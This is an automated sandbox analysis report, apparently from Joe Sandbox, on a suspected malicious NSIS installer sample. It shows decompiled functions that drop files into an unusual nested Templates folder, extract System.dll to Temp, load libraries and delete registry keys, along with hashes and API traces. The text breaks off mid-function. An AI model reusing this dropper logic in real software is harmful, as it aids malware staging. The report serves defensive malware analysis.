Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ ZB$ A$ A$... %d%%$}8@
API String ID: 551687249-3683892814
Opcode ID: 56b0f536eed8a80aa022ebbc190999bc8f902075b9028e03b58b2e81be541d07
Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
Opcode Fuzzy Hash: 56b0f536eed8a80aa022ebbc190999bc8f902075b9028e03b58b2e81be541d07
Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne\\BLATTARIAE\\Proprietrix\\Natick")), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp");
						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp$C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick$Call
API String ID: 1941528284-1848740903
Opcode ID: 26adae0b9d6820c41748f31339b4d2b50d746b4e6cc2488d5fab55ec8ec1e035
Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
Opcode Fuzzy Hash: 26adae0b9d6820c41748f31339b4d2b50d746b4e6cc2488d5fab55ec8ec1e035
Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

Uniqueness

Uniqueness Score: -1.00%

Function 02AC0000 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0;, xrefs: 02AC05BE
{, xrefs: 02AC0016
C, xrefs: 02AC0013
:, xrefs: 02AC0027
Q, xrefs: 02AC000A
e, xrefs: 02AC0010
y, xrefs: 02AC000D

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 0;$:$C$Q$e$y${
API String ID: 0-2646086558
Opcode ID: a195932124b4c81591e77f8286a10bb356897dcc2b2f8c3f3fd53da4be1b23c8
Instruction ID: 0e2ce8c2a3c7ec9321bdd677fdecc93387d56d5f23f65651d63e3db7ef7cd63a
Opcode Fuzzy Hash: a195932124b4c81591e77f8286a10bb356897dcc2b2f8c3f3fd53da4be1b23c8
Instruction Fuzzy Hash: E781797474870ADFEF345E789AE13EB77679F16390FA4416ECC4A87146DF228489CA02

Uniqueness

Uniqueness Score: -1.00%

Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4; // 0x1041e
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004055a5
0x004055af
0x004055b4
0x004055ba
0x004055c5
0x004055c8
0x004055cb
0x004055d1
0x004055d1
0x004055d7
0x004055df
0x004055e2
0x004055ff
0x00405603
0x0040560c
0x0040560c
0x00405616
0x0040561f
0x0040562b
0x00405632
0x00405636
0x00405639
0x0040564c
0x0040565a
0x0040565a
0x0040565e
0x00405660
0x00405663
0x00000000
0x00405663
0x004055e4
0x004055ec
0x004055f4
0x004055fa
0x00000000
0x004055fa
0x004055f4
0x004055e2
0x0040566f

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00403418), ref: 004055FA
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll), ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000), ref: 00406779

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll, xrefs: 004055C0, 004055D0, 004055D6, 004055F9, 00405605

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll
API String ID: 1495540970-4211874846
Opcode ID: 195069dcc2a5024ac29c7a45bf60c8768b6efe327543dfefb6c4dd5180e0e504
Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
Opcode Fuzzy Hash: 195069dcc2a5024ac29c7a45bf60c8768b6efe327543dfefb6c4dd5180e0e504
Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004068b1
0x004068ba
0x004068bc
0x004068bc
0x004068c0
0x004068d3
0x004068cd
0x004068cd
0x004068cd
0x004068ec
0x00406900
0x00406907

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Strings

%s%S.dll, xrefs: 004068E6
\, xrefs: 004068C2
UXTHEME, xrefs: 004068A3

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a79
0x00405a7d
0x00405a80
0x00405a86
0x00405a8a
0x00405a8e
0x00405a96
0x00405a9d
0x00405aa3
0x00405aaa
0x00405ab1
0x00405ab9
0x00405abb
0x00000000
0x00405abb
0x00405ac5
0x00405acc
0x00405ae2
0x00000000
0x00000000
0x00000000
0x00405ae4
0x00405ae8

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: dc8cb0d45d0e764757af0bf3ef39bc9c9df94b231d7a40b46c34be9b63524f7d
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: dc8cb0d45d0e764757af0bf3ef39bc9c9df94b231d7a40b46c34be9b63524f7d
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 70B21817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E70B21817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				void* _t39;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x70b2506c = _a8;
				 *0x70b25070 = _a16;
				 *0x70b25074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x70b25048, E70B21651);
				_push(1);
				_t37 = E70B21BFF();
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E70B2243E(_t54);
					}
					_push(_t54);
					E70B22480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E70B22655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E70B21666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E70B22655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E70B22655();
							_t37 = GlobalFree(E70B21312(E70B21654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E70B22618(_t54);
